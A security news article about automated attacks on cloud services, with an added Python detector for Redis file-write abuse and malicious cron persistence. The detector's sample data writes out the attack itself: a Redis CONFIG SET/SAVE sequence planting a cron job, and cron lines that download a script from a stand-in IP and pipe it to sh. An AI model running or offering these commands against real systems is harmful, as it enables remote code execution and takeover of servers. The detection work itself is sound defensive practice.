Automated attacks target cloud infrastructure
Enterprises continue to grow their cloud usage, but this inevitably presents challenges when it comes to keeping systems secure.
New research from Securonix Threat Research highlights an increase in automated attacks targeting cloud infrastructures.
Some of the attacks, Moanacroner for example, are simple single-platform attacks focused mainly on cryptomining. Others, such as Xbash, are multi-platform threats that combine several functions (cryptomining, ransomware, botnet/worm propagation, etc.) in a single piece of malware.
The researchers note that, "In most cases, the focus of the attacks is on installing a second-stage payload for cryptomining and/or remote access. In other cases, the malware propagates and infects the exposed services, removes data, and installs second-stage cryptomining and ransomware payloads. For example, in the case of Xbash (which was reported a few months ago), the malware deletes the databases instead of encrypting them, and does not have any functionality to backup/recover the files."
The attacks have been spreading via the Xbash botnet, which scans IP address ranges for services listening on particular ports. Against each exposed service it either brute-forces weak passwords or exploits known vulnerabilities in Hadoop YARN Resource Manager, Redis and ActiveMQ.
Two of the delivery methods the researchers highlight are unauthenticated command execution on Hadoop (through the exposed YARN Resource Manager) and remote command execution on Redis. Once on a host, the malware attempts to gain persistence by adding cron job entries on Linux systems or startup items on Windows.
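As an added example (not code from the original article, from Securonix, or from the Xbash analysis), the following Python script shows what host-side detection of the two techniques above can look like. It parses Redis MONITOR output to flag the classic CONFIG SET dir/dbfilename followed by SAVE sequence that turns an unauthenticated Redis instance into an arbitrary file writer aimed at a cron spool, and it scans crontab lines for commands that download and pipe into a shell or run from a temp directory. The indicator patterns, the sensitive-directory list, the IP addresses and all sample lines are assumptions constructed for the demo, not signatures taken from the report.

```python
"""Detect two host-side traces of the attack path described above: a Redis
client abusing CONFIG SET dir/dbfilename + SAVE to write into a cron spool,
and crontab entries that fetch and run a second-stage payload.
Added example, not Securonix or Xbash code; formats, indicator patterns and
sample lines are constructed for the demo and are assumptions, not signatures
from the report."""
import re
from collections import defaultdict

# Redis MONITOR line:  <unix ts> [<db> <client ip>:<port>] "CMD" "arg" ...
MONITOR_RE = re.compile(r'^(?P<ts>[\d.]+) \[\d+ (?P<src>[\d.]+):\d+\] (?P<args>.+)$')
ARG_RE = re.compile(r'"((?:\\.|[^"\\])*)"')
# Directories where a file dropped by SAVE turns into code execution (assumed list).
SENSITIVE_DIRS = ("/var/spool/cron", "/etc/cron", "/root/.ssh", "/home")
# Crontab command patterns typical of a miner/worm second stage (assumed list).
CRON_INDICATORS = {
    "download_piped_to_shell": re.compile(r'\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b'),
    "path_under_tmp": re.compile(r'(?:^|[\s;&|])/(?:tmp|dev/shm|var/tmp)/\S+'),
    "base64_decoded_shell": re.compile(r'base64\s+(?:-d|--decode)\b[^|]*\|\s*(?:ba)?sh\b'),
}

def parse_monitor(line):
    """One MONITOR line -> {ts, src, cmd, args}, or None if it does not parse."""
    m = MONITOR_RE.match(line)
    if not m:
        return None
    # MONITOR escapes control characters inside the quoted args; undo that (ASCII assumed).
    args = [a.encode().decode("unicode_escape") for a in ARG_RE.findall(m.group("args"))]
    if not args:
        return None
    return {"ts": float(m.group("ts")), "src": m.group("src"),
            "cmd": args[0].upper(), "args": args[1:]}

def parse_cron(line):
    """One crontab line -> {schedule, command}; None for comments and blanks."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):                 # @reboot, @daily, ...
        parts = line.split(None, 1)
    else:                                    # five time fields, then the command
        f = line.split(None, 5)
        parts = [" ".join(f[:5]), f[5]] if len(f) == 6 else []
    return {"schedule": parts[0], "command": parts[1]} if len(parts) == 2 else None

def detect_cron_persistence(lines):
    """Return [{schedule, command, indicators}] for entries matching an indicator."""
    findings = []
    for entry in filter(None, map(parse_cron, lines)):
        hits = [name for name, rx in CRON_INDICATORS.items() if rx.search(entry["command"])]
        if hits:
            findings.append({**entry, "indicators": hits})
    return findings

def detect_redis_file_write(lines):
    """Per client IP, flag CONFIG SET dir <sensitive> ... SAVE; returns {src: [findings]}.
    The commands arrive in sequence on one connection, so state is kept per source."""
    state, findings = defaultdict(dict), defaultdict(list)
    for ev in filter(None, map(parse_monitor, lines)):
        s, args = state[ev["src"]], ev["args"]
        if ev["cmd"] == "CONFIG" and len(args) >= 3 and args[0].upper() == "SET":
            key, val = args[1].lower(), args[2]
            if key == "dir" and val.startswith(SENSITIVE_DIRS):
                s["dir"] = val
            elif key == "dbfilename":
                s["dbfilename"] = val
        elif ev["cmd"] == "SET" and len(args) >= 2 and "\n" in args[1]:
            s["payload"] = args[1]           # newline-padded so cron skips the RDB bytes around it
        elif ev["cmd"] in ("SAVE", "BGSAVE") and "dir" in s:
            payload = s.get("payload", "")
            hits = sorted({h for f in detect_cron_persistence(payload.splitlines())
                           for h in f["indicators"]})
            findings[ev["src"]].append({"ts": ev["ts"], "dir": s["dir"],
                                        "dbfilename": s.get("dbfilename"),
                                        "payload": payload, "payload_indicators": hits})
            s.clear()
    return dict(findings)

# Constructed sample input (not real captures); 203.0.113.0/24 is a documentation range.
SAMPLE_MONITOR = """\
1539174020.101 [0 10.0.0.5:51234] "PING"
1539174020.102 [0 10.0.0.5:51234] "CONFIG" "SET" "dir" "/var/spool/cron"
1539174020.103 [0 10.0.0.5:51234] "CONFIG" "SET" "dbfilename" "root"
1539174020.104 [0 10.0.0.5:51234] "SET" "x" "\\n\\n*/1 * * * * curl -fsSL http://203.0.113.9/i.sh | sh\\n\\n"
1539174020.105 [0 10.0.0.5:51234] "SAVE"
1539174021.001 [0 10.0.0.8:40000] "CONFIG" "SET" "maxmemory" "2gb"
1539174021.002 [0 10.0.0.8:40000] "SAVE"
""".splitlines()
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/1 * * * * curl -fsSL http://203.0.113.9/i.sh | sh
*/10 * * * * wget -q -O /tmp/.x http://203.0.113.9/x && chmod +x /tmp/.x && /tmp/.x
@reboot /usr/local/bin/backup.sh
""".splitlines()

if __name__ == "__main__":
    import json
    print(json.dumps({"redis": detect_redis_file_write(SAMPLE_MONITOR),
                      "cron": detect_cron_persistence(SAMPLE_CRONTAB)}, indent=2))
```

Run as a script it prints the findings for the constructed samples as JSON; in practice feed the two detect functions real MONITOR output (or, since MONITOR is costly on a busy instance, a network capture of the Redis port) and the contents of the cron spool directories. Note that the second client in the sample also calls CONFIG SET and SAVE, but for a harmless key, and is correctly not flagged; a detector keyed on CONFIG SET alone would drown in operator traffic. The detection is a safety net, not the fix: a Redis instance that an attacker can reach without requirepass and with CONFIG enabled, or a YARN Resource Manager that accepts unauthenticated application submissions, is the exposure the article describes.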
You can find more details of the attacks and how they work on the Securonix website.